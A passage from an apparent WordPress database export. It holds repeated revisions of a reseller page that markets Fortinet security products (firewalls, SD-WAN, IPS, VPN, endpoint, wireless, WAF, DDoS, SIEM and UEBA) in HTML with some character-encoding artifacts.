location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:39:21','2019-09-30 03:39:21','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3554,1,'2019-09-30 11:41:07','2019-09-30 03:41:07','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n<h3></h3>\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n\r\n&nbsp;\r\n<h4><strong>Features and Benefits</strong></h4>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 